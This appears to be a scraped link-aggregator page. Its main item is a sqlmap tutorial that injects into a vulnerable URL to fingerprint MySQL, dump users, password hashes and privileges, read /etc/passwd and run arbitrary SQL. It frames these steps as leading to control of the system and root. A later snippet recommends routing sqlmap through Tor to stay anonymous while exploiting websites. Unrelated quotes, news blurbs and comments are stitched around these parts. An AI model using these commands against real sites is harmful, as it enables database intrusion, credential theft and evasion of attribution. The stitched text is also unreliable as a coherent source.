| |
|
|
| |
|
|
In the previous post on sqlmap basics we learnt how to use sqlmap to hack a vulnerable web application and fetch the list of databases, tables, columns and data rows. In this post we shall see how to do some simple fingerprinting on the remote database to find valuable information that can be used to assist in further exploitation of a system.
So lets say we have a vulnerable url
http://localhost/weak.php?id=10
where the id parameter is not escaped properly in the php code and suffers sql injection vulnerability. The commands to list out the databases would be
$ python ./sqlmap.py -u "http://localhost/weak.php?id=10" --dbs
Then use the -T --columns and the --dump options to list out the tables of a database, columns of a table and data in a table and so on.
Fingerprinting the remote system and its database
To find out more information about the remote system database use the option "-b". It will try to find the exact banner of the database server. Lets try it on a mysql database.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" -b
.....
[11:19:51] [INFO] the back-end DBMS is MySQL
[11:19:51] [INFO] fetching banner
[11:19:51] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:19:51] [INFO] retrieved: 5.1.61
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
banner: '5.1.61'
The output has the banner text which is "5.1.61". This is the mysql banner and clearly shows the mysql version being used. Now you can search google for any mysql vulnerabilities that might exist in this version of mysql.
The next command will fetch the list of users and roles.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10
..........
database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
.............
database management system users password hashes:
[*] [1]:
password hash: NULL
[*] root [2]:
password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
password hash: NULL
........
[*] %root% (administrator) [27]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
Getting the current user, current database and hostname information
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --current-user --is-dba --current-db --hostname --threads=10
........
[11:32:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[11:32:33] [INFO] fetching current user
[11:32:33] [INFO] retrieving the length of query output
[11:32:33] [INFO] retrieved: 14
[11:32:38] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[11:32:38] [INFO] fetching current database
[11:32:38] [INFO] retrieving the length of query output
[11:32:38] [INFO] retrieved: 5
[11:32:40] [INFO] resumed: profile_data
current database: 'profile_data'
[11:32:40] [INFO] fetching server hostname
[11:32:40] [INFO] retrieving the length of query output
[11:32:40] [INFO] retrieved: 21
[11:32:48] [INFO] retrieved: localhost.localdomain
hostname: 'localhost.localdomain'
[11:32:48] [INFO] testing if current user is DBA
[11:32:48] [INFO] fetching current user
current user is DBA: False
So in the above output we have the current user, current database, the hostname.
Reading a system file
On mysql if the database user has permission to the FILE operation, then it can read files from the file system. It can read only those files that are publicly readable or readable by the mysql user. Here is a quick example to read the /etc/passwd file.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10
sqlmap will store the file in its directory on the local file system, so that it can be read later.
Run arbitrary sql command
The sql-query option can be used to run arbitrary sql queries on the database.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" --sql-query="select now();"
...........
[11:50:22] [INFO] retrieved: 2013-04-15 11:51:10
select now();: '2013-04-15 11:51:10'
The last line in the output is the sql query output which was run on the remote database.
Conclusion
So with all the above information it gets easier to get further into the system and eventually take control of it, if possible. Sqlmap does quite a massive task by discovering the database, the data and details about the operating system. But in most cases it might not able to fully provide control of the remote system in the form of a shell.
Further techniques need to be employed to get greater control of the system and eventually root. We shall be discussing those in upcoming tutorials. |
|
|
|
| |
|
|
|
| cauz |
March 18, 2014, 4:06 a.m. |
| |
|
|
|
| Steve Ballmer |
The number one benefit of information technology is that it empowers people to do what they want to do. It lets people be creative. It lets people be productive. It lets people learn things they didn't think they could learn before, and so in a sense it is all about potential. |
| Winston Churchill |
We shall defend our island, whatever the cost may be, we shall fight on the beaches, we shall fight on the landing grounds, we shall fight in the fields and in the streets, we shall fight in the hills; we shall never surrender. |
| Andrew Card |
The Oval Office symbolizes... the Constitution, the hopes and dreams, and I'm going to say democracy. And when you have a dress code in the Supreme Court and a dress code on the floor of the Senate, floor of the House, I think it's appropriate to have an expectation that there will be a dress code that respects the office of the President. |
| Mike Ferguson |
Very few pilots even know how to read Morse code anymore. But if a pilot could read Morse code, he could tell which beacon he was approaching by the code that was flashing from it. |
| Hasan M. Elahi |
Information agencies operate in an industry that values data. Restricted access to information is what makes it valuable. |
| Thomas R. Insel |
A National Database on Autism Research is fostering sharing of data and collaborations. Scientists are also making great strides at the interface of biology and engineering with new technologies that are laying the groundwork for future advances. |
| Dr. Seuss |
When at last we are sure, You've been properly pilled, Then a few paper forms, Must be properly filled. So that you and your heirs, May be properly billed. |
| Dave Eggers |
When I was on the bestseller list with the first book, everyone who knows me knows that every week it continued to be on the list was a very dark week for me. Everyone knows that all I wanted was to be off that list. |
| Stephen Cambone |
That is really not much different from the search engines that are being constructed today for users throughout the entire world to allow them to search through databases to access the information that they require. |
| Stephen Cambone |
There is a reasonable concern that posting raw data can be misleading for those who are not trained in its use and who do not have the broader perspective within which to place a particular piece of data that is raw. |
|
|
|
|
When trying to exploit some website using sqlmap, its a good idea to be anonymous. Sqlmap has excellent support for using common proxies or tor.
First start tor and ensure that it is running the socks5 daemon on port 9050. Then use the socks5 proxy with sqlmap as follows
# ./sqlmap.py --tor --tor-type=SOCKS5 -u "http://www.hackable.org/view_section.php?id=10"
...
This post is a comment.
|
| |
|
|
|
Citizen Science Task: Come up with a color to match the crayon name!
Procedure:
1. Open up a color picker, for example, https://colorpicker.me/ or https://color.adobe.com/.
2. For each item in the numbered list: read them crayon names in list below and picture the color it describes.
3. Find that color in from your mind on your color picker and aim for high precision.
...
|
| |
|
|
|
French Gas Stations Robbed After Forgetting To Change Gas Pump PINs (zdnet.com) 66
French authorities have arrested five men who stole over 120,000 liters (26,400 gallons) of fuel from gas stations around Paris by unlocking gas pumps using a special remote. The five-man team operated with the help of a special remote they bought online and which could unlock a particular brand of gas pumps installed at Total gas stations. The hack was possible because some gas station managers didn't change the gas pump's default lock code from the standard 0000. Hackers would use this simple PIN code to reset fuel prices and remove any fill-up limits.
...
|
| |
|
|
|
|
have you thought about allowing an absurd number of characters? and while im typing this i'm noticing this nice little count down. nice. 500 is a pretty good limit really but what i meant was absurd absurd absurd absurd absurd number of characters where users could basically post articles or post their own essays of work and information and add to your database of knowledge related to other knowledge. knowledge. i still have about 75 characters left but its hard to tell because its still going down while im
|
| |
|
|
|
they sure have. however a lot of these captchas are pretty hard for even a human to distinguish whether there is a street sign or a storefront in an image, plus its not just the same things your looking for every time.
almost every major captcha breaking service uses humans to break it tho. they just send snapshots of the request to works and get it sent back and POST it.
One seo guy i worked with set up a system to post the captcha data to his back end and employed dozens of craigslist workers to solve them for money but didnt really pay them, so he had tons of people solving captchas all da...
This post is a comment.
|
| |
|
|
|
WikiLeaks Dump Reveals CIA Malware For Tracking Windows Devices Via WiFi Networks
WikiLeaks has published the documentation manual for an alleged CIA tool that can track users of Wi-Fi-capable Windows devices based on the Extended Service Set (ESS) data of nearby Wi-Fi networks. According to the tool's 42-page manual, the tool's name is ELSA. Bleeping Computer has an image embedded in its report that explains how the tool works. There are six steps that summarize the ELSA operation. Bleeping Computer reports:
Step 1: CIA operative configures ELSA implant (malware) based on a target's environment. This is done using a tool called the "PATCHER wizard," which generates the ELSA payload, a si...
|
| |
|
|
|
Scientists Create DNA-Based Exploit of a Computer System
Archeron an hour ago 18
Archeron writes: It seems that scientists at University of Washington in Seattle have managed to encode malware into genomic data, allowing them to gain full access to a computer being used to analyze the data. While this may be a highly contrived attack scenario, it does ask the question whether we pay sufficient attention to data-driven exploits, especially where the data is instrument-derived. What other systems could be vulnerable to a tampered raw data source? Perhaps audio and RF analysis systems? MIT Technology Review reports: "To carry out the hack, researchers led by Tadayoshi Kohno and Luis Ceze encoded malicious software in a short stretch of DNA they purchased online. They then used it to gain 'fu...
|
| |
|
|
|
|
I purposefully post some of the more esoteric-like stuff to try to get more comparisons in the future. These 'out there' thoughts that I've pondered are perfect for making connections using ThinkLynx. Eventually I want to post huge spiritual texts and excerpts of astronomy and technology and find weird correlations for no particular raisin
|
| |
|
|
|
|
Whenever I use databases, I make sure only to read from rows with uncommitted changes.
|
| |
|
|
|
Walmart Patents Cart That Reads Your Pulse, Temperature (vice.com) 114
Walmart recently applied to patent biometric shopping handles that would track a shopper's heart rate, palm temperature, grip force, and walking speed. "The patent, titled 'System And Method For A Biometric Feedback Cart Handle' and published August 23, outlines a system where sensors in the cart send data to a server," reports Motherboard. "That server then notifies a store employee to check on individual customers." From the report:
Over time, the server can build a database of data compared against store location and stress response, the patent says -- potentially valuable information for store planning. Other uses o...
|
| |